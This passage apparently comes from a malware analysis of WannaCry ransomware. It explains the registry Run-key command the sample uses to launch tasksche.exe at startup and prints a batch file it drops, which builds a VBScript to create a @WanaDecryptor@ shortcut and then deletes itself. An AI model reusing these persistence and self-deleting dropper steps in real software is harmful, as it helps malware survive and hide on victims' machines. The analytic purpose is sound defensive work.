HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run specifies the location in the registry where the new entry will be added. This location is where Windows looks for programs to run at startup.
/v "xvggyhfuuf622" specifies the name of the new entry to be added to the registry. This can be any unique name you choose.
/t REG_SZ specifies the data type of the value to be added to the registry. In this case, it is a string value.
/d "\"C:\Users\User\Desktop\tasksche.exe\"" specifies the data that will be added to the registry. In this case, it is the path to the executable file that will be run at startup. The backslashes are used to escape the quotes around the file path.
/f is a switch that specifies that the command should be executed without prompting for confirmation.

So, this file will be run automatically under the name “xvggyhfuuf622” which got from the computer name by The Run Key “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”

and here for running this command by CreateProcessA API:

Then He tried to run this which was saved in a random bat file:

@echo off

echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs

echo SET om = ow.CreateShortcut("C:\Users\User\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs

echo om.TargetPath = "C:\Users\User\Desktop\@WanaDecryptor@.exe">> m.vbs

echo om.Save>> m.vbs

cscript.exe //nologo m.vbs

del m.vbs


del /a %0

And run this bat file: